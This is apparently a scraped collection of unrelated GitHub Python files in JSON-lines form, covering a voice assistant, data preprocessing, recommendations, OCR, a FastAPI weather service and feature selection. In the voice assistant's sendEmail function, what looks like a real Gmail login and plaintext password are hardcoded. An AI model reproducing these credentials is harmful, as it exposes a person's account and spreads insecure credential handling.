Please tell me how may I help you\")\r\n\r\ndef takeCommand():\r\n #It takes microphone input from the user and returns string output\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 0.8\r\n audio = r.listen(source)\r\n\r\n try:\r\n print(\"Recognizing...\")\r\n query = r.recognize_google(audio, language='en-Us')\r\n print(f\"User said: {query}\\n\")\r\n\r\n except Exception as e:\r\n # print(e)\r\n print(\"Say that again please...\")\r\n return \"None\"\r\n return query\r\n\r\ndef sendEmail(to, content):\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login('hmehedi953@gmail.com', 'm21324611')\r\n server.sendmail('mehedi.mbstu.ict.13@gmail.com', to, content)\r\n server.close()\r\n\r\nif __name__ == \"__main__\":\r\n wishMe()\r\n while True:\r\n # if 1:\r\n query = takeCommand().lower()\r\n\r\n # Logic for executing tasks based on query\r\n if 'wikipedia' in query:\r\n speak('Searching Wikipedia...')\r\n query = query.replace(\"wikipedia\", \"\")\r\n results = wikipedia.summary(query, sentences=2)\r\n speak(\"According to Wikipedia\")\r\n print(results)\r\n speak(results)\r\n\r\n elif 'hay' in query:\r\n speak('Yes Sir, I am here for you...')\r\n\r\n elif 'who are you' in query:\r\n speak('I am Friday! Iron Man updated creation. version 2.0')\r\n\r\n\r\n elif 'hi' in query:\r\n speak('Hi Sir...')\r\n\r\n elif 'nothing' in query:\r\n speak('okay Sir...')\r\n\r\n elif 'how can you help' in query:\r\n speak('I can help you what i have programed Sir!...')\r\n\r\n elif 'what is python' in query:\r\n speak('Python is an interpreted, object-oriented, high-level programming language ...')\r\n\r\n elif 'i love you friday' in query:\r\n speak('I Love You Too Sir! Thank you...')\r\n\r\n elif 'hello friday' in query:\r\n speak('Welcome Home Sir!, I am here for you...')\r\n\r\n elif 'boyfriend' in query:\r\n speak('no Sir!I have no boyfriend Sir! I am here for you...')\r\n\r\n elif 'who create you' in query:\r\n speak('Mehedi hasan created me...')\r\n\r\n elif 'created you' in query:\r\n speak('Mehedi hasan created me...')\r\n\r\n elif 'your boss' in query:\r\n speak('Mehedi hasan...')\r\n\r\n elif 'thank you' in query:\r\n speak('You are welcome Sir..')\r\n\r\n elif 'iron man' in query:\r\n speak(' Iron man is the one who created me.')\r\n speak('He is a legend! I Love Him too!...')\r\n\r\n\r\n elif 'exit' in query:\r\n speak('Okay Sir, I am going to sleep now!...')\r\n speak('I Love you 3000!...')\r\n\r\n elif 'beautiful' in query:\r\n speak('Thank you so much Sir!...')\r\n\r\n elif 'can you sing' in query:\r\n speak('Thank you Sir! but I can not sing...')\r\n speak('But I can help you for your song from youtube.can I?..')\r\n\r\n elif 'ok play' in query:\r\n speak('Okay playing Sir!...')\r\n webbrowser.open(\"https://www.youtube.com/watch?v=hHNJSMUgWBM\")\r\n\r\n\r\n elif 'sweet' in query:\r\n speak('Thank you Sir!...')\r\n\r\n elif 'how are you' in query:\r\n speak('I am absulately fine Sir....')\r\n speak('How are you Sir?....')\r\n\r\n\r\n\r\n\r\n\r\n\r\n elif 'open youtube' in query:\r\n speak('Ok Sir, I am opening youtube...')\r\n webbrowser.open(\"https://www.youtube.com/\")\r\n\r\n elif 'open google' in query:\r\n speak('Ok Sir, I am opening google...')\r\n webbrowser.open(\"google.com\")\r\n\r\n elif 'open stackoverflow' in query:\r\n speak('Ok Sir, I am opening stackoverflow...')\r\n webbrowser.open(\"stackoverflow.com\")\r\n\r\n elif 'google map' in query:\r\n speak('Sure Sir! which place do you want to search?')\r\n\r\n elif 'dhaka' in query:\r\n speak('Ok Sir, I am working on it...')\r\n webbrowser.open(\"https://www.google.com/maps/place/Dhaka/@23.7808875,90.2792371,43668m/data=!3m2!1e3!4b1!4m5!3m4!1s0x3755b8b087026b81:0x8fa563bbdd5904c2!8m2!3d23.810332!4d90.4125181\")\r\n speak('Here it is! ')\r\n\r\n\r\n\r\n\r\n elif 'play music' in query:\r\n speak('Ok Sir, I am playing music for you...')\r\n music_dir = 'E:\\\\Alan'\r\n songs = os.listdir(music_dir)\r\n print(songs)\r\n os.startfile(os.path.join(music_dir, songs[0]))\r\n\r\n elif 'time' in query:\r\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n speak(f\"Sir, the time is {strTime}\")\r\n\r\n elif 'open code' in query:\r\n codePath = \"C:\\\\Users\\\\MEHEDI\\\\Desktop\\\\Jervis\"\r\n os.startfile(codePath)\r\n\r\n elif 'mail' in query:\r\n try:\r\n speak(\"What should I say?\")\r\n content = takeCommand()\r\n to = \"mehedi.mbstu.ict.13@gmail.com\"\r\n sendEmail(to, content)\r\n speak(\"Email has been sent!\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"Sorry Sir. I am not able to send this email\")\r\n","repo_name":"Mehedi16009/Ironman-Assistant-Friday","sub_path":"friday.py","file_name":"friday.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43244328403","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndftab1 = pd.read_csv(\"tab1.csv\")\r\n\r\nid_ = list(dftab1.iloc[0:1,0:5].columns.values)\r\nvalues_ = list(dftab1.iloc[0:1,5:].columns.values)\r\n\r\ndftab1_melt = pd.melt(dftab1, id_vars = id_, value_vars = values_)\r\n\r\ndftab1_melt['rowindex'] = dftab1_melt['iso3'].apply(str) + ',' +dftab1_melt['country_name'].apply(str) + ',' + dftab1_melt['variable'].apply(str)\r\ndftab1_melt['columnindex'] = dftab1_melt['dimension'].apply(str)+',' +dftab1_melt['indicator_id'].apply(str)+','+dftab1_melt['indicator_name'].apply(str)\r\n\r\ndftab1_melt_pivot = dftab1_melt.pivot(index='rowindex',\r\n columns = 'columnindex',\r\n values = 'value')\r\n\r\ndftab1_melt_pivot.to_csv('dftab1_melt_pivot1.csv', sep = ',', encoding = 'utf-8')\r\n\r\n#list_index = dftab1_melt_pivot.columns.values.astype(str)[np.char.find(dftab1_melt_pivot.columns.values.astype(str), 'index')>0].tolist()\r\n#list_indices = dftab1_melt_pivot.columns.values.astype(str)[np.char.find(dftab1_melt_pivot.columns.values.astype(str), 'indices')>0].tolist()\r\n\r\n#list_index_ = list_index+list_indices\r\n\r\ndf_index = dftab1_melt_pivot.loc[:,['Composite indices,137506,Human Development Index (HDI)',\r\n 'Education,103706,Education index',\r\n 'Health,103206,Life expectancy index',\r\n 'Income/composition of resources,103606,Income index']]\r\n\r\ndf_index_ = df_index[(dftab1_melt_pivot.index.str.find('2012') > 0) | (dftab1_melt_pivot.index.str.find('2017') > 0)]\r\n\r\n\r\ndf_index_.to_csv('df_index_1.csv', sep = ',', encoding = 'utf-8')\r\n","repo_name":"blueetree/HDI","sub_path":"hdi/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38382223238","text":"'''\nCreated on Feb 1, 2017\n\n@author: Pragya\n'''\n\nfrom algos import Recommendation\nfrom algos.Recommendation import pearson_similarity, top_matches, getRecommendations\nfrom algos.ItemBasedRecommendation import transformToProductData,\\\n calculateItemSimilars, getItemRecommendations\n\ncritics = {\n 'Rose':{'Lady in the water': 2.5, 'Snakes on a plane': 3.5, 'Just my luck': 3.0, 'Superman Returns': 3.5, 'You me and dupree': 2.5, 'The night listener':3.0},\n 'Gene':{'Lady in the water': 3.0, 'Snakes on a plane': 3.5, 'Just my luck': 1.5, 'Superman Returns': 5, 'You me and dupree': 3, 'The night listener':3.5},\n 'Michael':{'Lady in the water': 2.5, 'Snakes on a plane': 3, 'Superman Returns': 3.5, 'The night listener':4},\n 'Claudia':{'Snakes on a plane': 3.5, 'Just my luck': 3, 'Superman Returns': 4, 'You me and dupree': 2.5, 'The night listener':4.5},\n 'Mick':{'Lady in the water': 3.0, 'Snakes on a plane': 4, 'Just my luck': 2, 'Superman Returns': 3, 'You me and dupree': 2, 'The night listener': 3},\n 'Jack':{'Lady in the water': 3.0, 'Superman Returns': 5, 'You me and dupree': 3.5},\n 'Toby':{'Snakes on a plane': 4.5, 'Superman Returns': 4, 'You me and dupree': 1}\n }\n\n# print(pearson_similarity(critics, 'Rose', 'Toby'))\n# print(pearson_similarity(critics, 'Gene', 'Toby'))\nprint(\"top matches for Rose\")\nprint(top_matches(critics, 'Rose', 5))\nprint(\"get recommendations for Toby\")\nprint(getRecommendations(critics, \"Toby\"))\n\nprint(\"transform to a item based list\")\nresult = transformToProductData(critics)\nprint(result)\n\nprint(\"calculate item similarities\")\nitemSimilars = calculateItemSimilars(result)\nprint(itemSimilars)\n\nprint(\"get item recommendations\")\nprint(getItemRecommendations(critics, itemSimilars, \"Toby\"))","repo_name":"saxenapragya8/MLAlgorithms","sub_path":"algos/RecommendationRunner.py","file_name":"RecommendationRunner.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12315275995","text":"from PythonClient import *\nimport time\n\nclass Vehicle(AirSimClient):\n\n VelocityDuration = 1000000\n\n def __init__(self, ip = \"\"):\n super().__init__()\n super().confirmConnection()\n super().enableApiControl(True)\n if super().armDisarm(True):\n print('connect succeed!')\n self.homeGps = super().getHomeGeoPoint() \n self.updateState() \n self.stateEmergencyChange = False \n pass\n \n def updateState(self):\n self.position = super().getPosition()\n self.velocity = super().getVelocity()\n self.orientation = super().getOrientation()\n self.slefGPS = super().getGpsLocation()\n self.collision = super().getCollisionInfo()\n self.rollPitchYaw = super().getRollPitchYaw()\n \n def accelerate(self, acc, duration): \n start = 0.0 \n self.updateState()\n startVelocity = self.velocity \n if duration < 0.1:\n acc = acc*(duration/0.1)\n duration = 0.1\n while start List[List[str]]:\n h = {}\n for word in strs:\n # アナグラムをソートして、同じ文字に変換する\n sortedWord = ''.join(sorted(word))\n # 辞書に登録していない文字列であれば登録して、すでに登録済みであればそのキーに追加する。\n if sortedWord not in h:\n h[sortedWord] = [word]\n else:\n h[sortedWord].append(word)\n\n # 辞書にキー毎にまとめたvaluesを提出用にfinalの配列にまとめる\n final = []\n for value in h.values():\n final.append(value)\n return final\n","repo_name":"mizutaninaoki/AtCoderPractice","sub_path":"z_snipets/文字列問題/配列の中の複数の文字列をアナグラム毎にグループ分け���る.py","file_name":"配列の中の複数の文字列をアナグラム毎にグループ分けする.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69954180329","text":"\n\n# Press the green button in the gutter to run the script.\nfrom src.dominio import Avaliador, Leilao, Usuario, Lance\n\nif __name__ == '__main__':\n gui = Usuario('Gui')\n yuri = Usuario('Yuri')\n\n lance_do_yuri = Lance(yuri, 100.0)\n lance_do_gui = Lance(gui, 150.0)\n\n leilao = Leilao('Celular')\n\n leilao.lances.append(lance_do_yuri)\n leilao.lances.append(lance_do_gui)\n\n\n avaliador = Avaliador()\n avaliador.avalia(leilao)\n\n print(f'Maior lance: {avaliador.maior_lance}')\n print(f'Menor lance: {avaliador.menor_lance}')\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"ebwang/switchblade","sub_path":"tdd_python/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70141858409","text":"import time\nfrom tkinter import *\n\ntk = Tk()\ncanvas = Canvas(tk, height=200, width=400)\ncanvas.pack()\ncanvas.create_polygon(10, 10, 10, 60, 50, 35)\nfor _ in range(60):\n canvas.move(1, 5, 2)\n tk.update()\n time.sleep(0.1)\n\nfor _ in range(60):\n canvas.move(1, -5, -2)\n tk.update()\n time.sleep(0.1)\n","repo_name":"giorno39/tkinter_ex","sub_path":"first_ex/chervena_pitanka_nad_zad_1.py","file_name":"chervena_pitanka_nad_zad_1.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73721182887","text":"from atelier.invlib import setup_from_tasks\n\nns = setup_from_tasks(\n globals(), \"lino\",\n # tolerate_sphinx_warnings=True,\n languages=\"en de fr et nl pt-br es zh-hant bn\".split(),\n doc_trees=[],\n blogref_url='https://luc.lino-framework.org',\n revision_control_system='git',\n locale_dir='lino/locale')\n","repo_name":"lino-framework/lino","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"26532065769","text":"import requests\nimport datetime as dt\nimport os\n\nfrom sqlalchemy.orm import Session\nfrom dotenv import load_dotenv\n\nfrom . import models, schemas\n\n\nload_dotenv(dotenv_path='.env')\nAPPID = os.getenv('APPID')\n\n# Вспомогательные функции\n# 1. Подсчет количества городов в БД\ndef count_cities(db: Session) -> int:\n return db.query(models.City).count()\n\n\n# 2. Получение city.id по названию города (city.name)\ndef get_city_id(db: Session, city_name: str) -> int:\n \"\"\"Returns id (int) of the given city name (str).\"\"\"\n return db.query(models.City).filter(models.City.name == city_name).first().id\n\n\n# 3. Подсчет среднего значения заданного параметра (column_name) для определенного города\ndef count_avg(db: Session, city_id: int, column_name: str):\n \"\"\"Returns key-value (dict). Key - avg_. Value - average value of the given parameter (column).\"\"\"\n query = db.execute(\n f\"\"\"\n SELECT AVG({column_name}) as avg_{column_name}\n FROM weather_info \n WHERE city_id = {city_id}\n \"\"\"\n ).first()\n return query\n \n\n# 5. Функция поиска города на openweather. Возвращает координаты города в виде словаря\ndef city_coordinates(city_name: str):\n \"\"\"If the city is in openweather.com then returns its' coordinates {'lan': .., 'lat': ..}, otherwise returns None\"\"\"\n url = 'http://api.openweathermap.org/geo/1.0/direct?'\n params = {\n 'q': city_name,\n 'appid': APPID,\n }\n response = requests.get(url=url, params=params).json()\n if city_name.title() in response[0]['name']:\n return {\n 'lat': response[0]['lat'],\n 'lon': response[0]['lon']\n }\n\n\n# 6. Возврат списка городов\ndef city_list(db: Session):\n \"\"\"Returns a list of all cities in database\"\"\"\n return db.query(models.City).all()\n \n\n# 7. Проверка наличия города в базе данных\ndef city_in_db(db: Session, city_name: str) -> bool:\n \"\"\"Checks if city is already in the database\"\"\"\n db_city_check = db.query(models.City).filter_by(name=city_name).first()\n if db_city_check == None:\n return False\n return True\n\n\n# Целевые функции\n# 1. Возвращает список существующих городов с последней записанной температурой\ndef get_last_weather(db: Session, search: str | None):\n query = []\n if search != None:\n query.append(db.execute(\n f\"\"\"\n SELECT * \n FROM weather_info \n WHERE city_name LIKE '%{search.capitalize()}%'\n ORDER BY date_time DESC \n \"\"\").first())\n\n else: \n city_ids = [x['id'] for x in db.query(models.City.id).all()]\n for id in city_ids:\n query.append(db.execute(\n f\"\"\"\n SELECT * \n FROM weather_info \n WHERE city_id = {id}\n ORDER BY date_time DESC \n \"\"\").first())\n return query\n\n# def get_last_weather(db: Session):\n# city_names = [x['name'] for x in db.query(models.City.name).all()]\n# query = []\n# for name in city_names:\n# query.append(db.execute(\n# f\"\"\"\n# SELECT * \n# FROM weather_info \n# WHERE city_name = {name}\n# ORDER BY date_time DESC \n# \"\"\").first())\n# return query\n\n\n# 2. По заданному городу возвращает все данные за выбранный период, а также их средние значения за этот период\ndef get_city_stats(\n db: Session, \n city: str, \n date_time_start=dt.datetime(year=2023, month=1, day=1), \n date_time_end=dt.datetime.now()\n ):\n city_id = get_city_id(db=db, city_name=city.title())\n\n records = db.query(models.WeatherInfo).filter(\n models.WeatherInfo.city_id == city_id, \n date_time_start <= models.WeatherInfo.date_time,\n date_time_end >= models.WeatherInfo.date_time\n ).all()\n average_values = {\n **count_avg(db=db, city_id=city_id, column_name='temperature'),\n **count_avg(db=db, city_id=city_id, column_name='atm_pressure'),\n **count_avg(db=db, city_id=city_id, column_name='wind_speed')\n }\n return {'average_valus': average_values, 'records': records, }\n \n\n# 3. Добавляет город в БД, если он есть на openweather\ndef add_city(db: Session, city: str):\n coord = city_coordinates(city_name=city)\n if coord != None:\n lat = coord['lat']\n lon = coord['lon']\n db_city = models.City(name=city.title(), lat=lat, lon=lon)\n db.add(db_city)\n db.commit()\n db.refresh(db_city)\n return db_city\n\n","repo_name":"Juslow/fastapi_scrapy","sub_path":"db/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25608457066","text":"\r\ndef fib1(n):\r\n '''\r\n Prints out all fibonacci numbers less than or equal to the given number.\r\n\r\n Keyword arguments:\r\n\r\n n -- Upper limit of the fibonacci sequence\r\n\r\n Returns: nothing\r\n '''\r\n a, b = 0, 1\r\n while a < n:\r\n print(a)\r\n a, b = b, a+b\r\n print()\r\n\r\n\r\ndef fib2(n):\r\n a, b = 0, 1\r\n result = []\r\n while a < n:\r\n result.append(a)\r\n a, b = b, a+b\r\n return result\r\n\r\nif __name__ == '__main__':\r\n print('whatchu doin here m8 git out ya cant')\r\n fib1(1000)","repo_name":"NukaDuka/Code-repository","sub_path":"fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19546477443","text":"import time\n\nimport cv2\nimport pytesseract\n\n\ndef read_text(file,name):\n pytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n img = cv2.imread(file)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, thresh1 = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY_INV)\n rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (18, 18))\n dilation = cv2.dilate(thresh1, rect_kernel, iterations=1)\n contours, hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n im2 = img.copy()\n file = open(name + \".txt\", \"w+\")\n file.write(\"\")\n file.close()\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n\n # Drawing a rectangle on copied image\n rect = cv2.rectangle(im2, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n # Cropping the text block for giving input to OCR\n cropped = im2[y:y + h, x:x + w]\n\n # Open the file in append mode\n file = open(name + \".txt\", \"a\")\n\n # Apply OCR on the cropped image\n text = pytesseract.image_to_string(cropped)\n\n # Appending the text into file\n file.write(text)\n file.write(\"\\n\")\n\n # Close the file\n file.close\n\n","repo_name":"grimok/ITDepremYardim","sub_path":"textdetection.py","file_name":"textdetection.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22191202048","text":"from datetime import MAXYEAR, MINYEAR\n\nfrom django.utils import timezone\nfrom rest_framework import serializers\n\n\nclass YearListMonthSerializer(serializers.Serializer):\n year = serializers.IntegerField(\n label=\"Год\",\n min_value=1970,\n max_value=timezone.now().year,\n help_text=\"Максимальный год равен текущему году\",\n )\n months = serializers.ListSerializer(\n child=serializers.IntegerField(\n label=\"Месяц\",\n min_value=1,\n max_value=12,\n ),\n label=\"Месяцы\",\n )\n\n\nclass YearSerializer(serializers.Serializer):\n \"\"\"Сериализатор параметра year.\"\"\"\n\n year = serializers.IntegerField(\n min_value=MINYEAR + 1,\n max_value=MAXYEAR,\n required=False,\n )\n\n\nclass YearMonthSerializer(YearSerializer):\n \"\"\"Сериализатор параметров year и month.\"\"\"\n\n month = serializers.IntegerField(\n min_value=1,\n max_value=12,\n required=False,\n )\n","repo_name":"Studio-Yandex-Practicum/Lubimovka_backend","sub_path":"apps/articles/serializers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"ru","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"73856176488","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport sys\nfrom DataOpenCV import *\nfrom ImageViewer import *\nfrom defaultImage import defaultData\nfrom pyqtgraph import ImageView\n\n\nclass ImageLayout(QWidget):\n \"\"\"\n ImageLayout: a QWidget containing the label, OPEN button, the image viewer and the components viewer\n :param index: the index of the image layout. First: 0, Second: 1\n logger: the logger of the main application\n :arg data: the ImageData class\n selected: shows if ImageViewer is occupied with data or not\n index: the index of imageLayout\n selectedSize: if the image is selected set the size to compare with the other image\n imageLayout: the main layout of the image\n \"\"\"\n sendData = pyqtSignal(list)\n setSize = pyqtSignal(list)\n\n\n def __init__(self, index, logger):\n super().__init__()\n\n\n self.data = None\n self.selected = False\n self.index = index\n self.selectedSize = None\n self.logger = logger\n self.imageLayout = QVBoxLayout()\n self.setLabelUI()\n self.setImageUI()\n\n\n self.setFixedSize(850, 450)\n self.setLayout(self.imageLayout)\n\n def setLabelUI(self):\n \"\"\"\n setLabelUI initiates the UI of the labelLayout that contains the image label, component comppbox and the open\n button\n :param: self\n :return: None\n \"\"\"\n\n labelLayout = QHBoxLayout()\n\n\n self.nameLabel = QLabel(\"IMAGE \"+str(self.index+1))\n self.nameLabel.setStyleSheet(\"font-size: 16px\")\n labelLayout.addWidget(self.nameLabel)\n\n self.combobox = QComboBox()\n self.combobox.setStyleSheet(\"font-size: 16px\")\n self.combobox.addItem(\"Magnitude\")\n self.combobox.addItem(\"Phase\")\n self.combobox.addItem(\"Real\")\n self.combobox.addItem(\"Imaginary\")\n labelLayout.addWidget(self.combobox)\n self.combobox.setEnabled(False) # When the image is not shown, make the component combobox disabled\n self.combobox.activated[str].connect(self.showComponent)\n\n openButton = QPushButton(\"Open\")\n openButton.clicked.connect(self.openImage)\n labelLayout.addWidget(openButton)\n\n\n labelBox = QGroupBox()\n labelBox.setFixedHeight(45)\n labelBox.setLayout(labelLayout)\n self.imageLayout.addWidget(labelBox)\n\n def setImageUI(self):\n \"\"\"\n setImageUI: sets the ui of the image by adding 2 ImageViewer Classes one for the image itself and the other for the\n component layout\n :param self\n :return none\n \"\"\"\n imageViewerLayout = QHBoxLayout()\n\n\n self.imageLabel = ImageViewer()\n data = defaultData() # defaultData returns data of the opening image\n self.imageLabel.image.setImage(data)\n\n\n imageViewerLayout.addWidget(self.imageLabel)\n\n self.componentLabel = ImageViewer()\n data = defaultData()\n self.componentLabel.image.setImage(data)\n\n\n\n imageViewerLayout.addWidget(self.componentLabel)\n\n imageViewerBox = QGroupBox()\n imageViewerBox.setLayout(imageViewerLayout)\n self.imageLayout.addWidget(imageViewerBox)\n\n\n def openImage(self):\n \"\"\"\n openImage: opens a OpenFileDialog which returns the path of the image. Then gets the data using getImageData fn.\n make sure of some conditions regarding the size and if everthing is right, show the image. else, show an error message\n :param self\n :return: none\n \"\"\"\n message = \"OPEN button for image \"+str(self.index+1)+\" is clicked.\"\n self.logger.debug(message)\n\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n path, _ = QFileDialog.getOpenFileName(self, \"Open Image\", \"\",\n \"Images Files (*.jpg *.jpeg)\", options=options)\n\n if path:\n name = self.getFileName(path)\n\n data = getImageData(path)\n\n\n if self.selectedSize == None:\n # Here, there was no image selected. So show the image and set the size\n self.data = data\n self.imageLabel.image.setImage(self.data.data.T, scale=(400, 400))\n self.componentLabel.image.setImage(self.data.magPlot.T, scale=(400, 400))\n self.selected = True\n self.combobox.setEnabled(True)\n self.sendImageSize()\n self.nameLabel.setText(\"Image {}: {}\".format(self.index+1, name))\n self.selectedSize = [self.data.width, self.data.height]\n firstImageSelected = \"Image {}: {} is selected and shown\".format(self.index+1, name)\n self.logger.debug(firstImageSelected)\n self.sendDataFunction()\n # print(self.data.width, self.data.height)\n\n else:\n # Now, there is already a chosen image, so we have to check the size of new image that it is compatible\n # with the first image.\n if self.selectedSize[0] == data.width and self.selectedSize[1] == data.height:\n self.data = data\n self.imageLabel.image.setImage(self.data.data.T, scale=(400, 400))\n self.componentLabel.image.setImage(self.data.magPlot.T, scale=(400, 400))\n self.nameLabel.setText(\"Image {}: {}\".format(self.index + 1, name))\n self.selected = True\n self.combobox.setEnabled(True)\n self.sendDataFunction()\n complementIndex = self.complementIndex(self.index)\n secondImageSelected = \"Image {} is selected and it does have the same size as image {}\"\\\n .format(self.index+1, complementIndex+1)\n self.logger.debug(secondImageSelected)\n print(self.data.width, self.data.height)\n else:\n # Now, the new image is NOT compatible with the first chosen image. Then, an error message is show to\n # either select another image or press RESET if he/she to work on this image\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\"Please select an image with the same size as the already selected.\" +\n \" Please press RESET if you want to work on this image\")\n msg.setWindowTitle(\"Error\")\n msg.exec_()\n complementIndex = self.complementIndex(self.index)\n sizeErrorMessage = \"You have selected an image that doesn't have the same size as Image \" + str(complementIndex+1)\n self.logger.warning(sizeErrorMessage)\n\n else:\n cancelMessage = \"The open was closed without selecting the image\"\n self.logger.debug(cancelMessage)\n\n\n\n def showComponent(self, comp):\n \"\"\"\n showCompoenent: depending on the component selected. the component image viewer shows it.\n :param comp: comp: ('Magnitude', 'Phase', 'Real', 'Imaginary')\n :return: None\n \"\"\"\n if comp == \"Magnitude\":\n arr = self.data.magPlot.T\n elif comp == \"Phase\":\n arr = self.data.phasePlot.T\n elif comp == \"Real\":\n arr = self.data.realPlot.T\n elif comp == \"Imaginary\":\n arr = self.data.imgPlot.T\n componentViewChanged = \"Now Showing the {} component of image {}\".format(comp, self.index+1)\n self.logger.debug(componentViewChanged)\n self.componentLabel.image.setImage(arr, scale=(400, 400))\n\n @pyqtSlot()\n def sendDataFunction(self):\n \"\"\"\"\n sendDataFunction: a signal that is emitted when an image is selected successfully and sends its ImageData class\n to the OutputLayout class.\n \"\"\"\n sendList = [self.index, self.data]\n self.sendData.emit(sendList)\n print(\"Sent Here\")\n\n def reset(self):\n \"\"\"\"\n reset: when RESET button is clicked, everything is back to the opening state to work on other images.\n \"\"\"\n data = defaultData()\n self.imageLabel.image.setImage(data)\n self.componentLabel.image.setImage(data)\n self.selectedSize = None\n\n @pyqtSlot()\n def sendImageSize(self):\n \"\"\"\n sendImageSize: a signal that is emitted when image is set to send its size to the other ImageLayoyut widget\n :return: None\n \"\"\"\n imageSize = [self.data.width, self.data.height]\n sizeSetMessage = \"Size set to {}x{}\".format(imageSize[0], imageSize[1])\n self.logger.debug(sizeSetMessage)\n self.setSize.emit(imageSize)\n print(\"Size Set\")\n\n @pyqtSlot(list)\n def setImageSize(self, size):\n \"\"\"\n setImageSize: if this image doesn't have a selectedSize, then, this will tell it that an image is selected and\n sets its size to selectedSize\n :param size: the size list sent by sendImageSize signal.\n :return: None\n \"\"\"\n if self.selectedSize == None:\n self.selectedSize = size\n print(\"Size Recieved\")\n\n @staticmethod\n def complementIndex(index):\n \"\"\"\n complementIndex takes the index and return its complement (The other index)\n :param index: the index selected\n :return int (0, 1): the other index\n \"\"\"\n if index == 1:\n return 0\n elif index == 0:\n return 1\n\n def getFileName(self, path):\n \"\"\"\n getFileName gets the file name out of its path\n :param path: the path of the file as it contains the file name\n :return: the name of the file\n \"\"\"\n return path.split('.')[-2].split('/')[-1]\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = ImageLayout(0)\n win.show()\n sys.exit(app.exec_())\n","repo_name":"AhmedKhaled8/ImageComponentsMixer","sub_path":"ImageLayout.py","file_name":"ImageLayout.py","file_ext":"py","file_size_in_byte":10070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24832179448","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 24 10:20:07 2022\n\n@author: Zheng Zhu\n\"\"\"\n\nimport library as lb\nimport parameters as ps\n\n\ndef constant_feature_drop(df):\n\n df = (df.loc[:, (df != df.iloc[0]).any()])\n\n df_constant_features = lb.pd.DataFrame(list((df.loc[:, (df == df.iloc[0]).all()]).columns), columns = ['constant_features_drop'])\n \n return (df, df_constant_features)\n\n\ndef missing_value_feature_drop(df, treshold):\n\n all_features_list = list(df.columns)\n\n df = df.dropna(thresh= (1.0-treshold)*len(df), axis=1)\n\n missing_value_features_list = [feature for feature in all_features_list if feature not in list(df.columns)]\n\n df_missing_value_features = lb.pd.DataFrame(missing_value_features_list, columns = ['missing_value_features_drop'])\n\n return (df, df_missing_value_features)\n\n\ndef correlation_matrix(df):\n\n feature_corr=df.corr()\n\n return (feature_corr)\n\n\ndef correlation_features_drop(df, target, threshold):\n \n features_corr = correlation_matrix(df)\n\n features_drop_set = set()\n\n columns_list = df.columns.tolist()\n\n for column_1 in columns_list:\n\n for column_2 in columns_list:\n\n if column_1 != target and column_2 != target and column_1 != column_2:\n\n if abs(features_corr.loc[column_1, column_2]) > threshold:\n\n iv_1 = calc_iv_single_feature(df, column_1, target, False)\n\n iv_2 = calc_iv_single_feature(df, column_2, target, False)\n\n features_drop_set.add(column_1 if iv_1 < iv_2 else column_2)\n\n df = df.drop(list(features_drop_set), axis = 1)\n\n df_correlation_features = lb.pd.DataFrame(list(features_drop_set), columns = ['correlation_features_drop'])\n\n return (df, df_correlation_features) \n\n\n\ndef calc_iv_single_feature(df, feature, target, pr=False):\n\n d1 = df.groupby(by=feature, as_index=True)\n\n data = lb.pd.DataFrame()\n\n data['all'] = d1[target].count()\n\n data['bad'] = d1[target].sum()\n\n data['share'] = data['all'] / data['all'].sum()\n\n data['bad_rate'] = 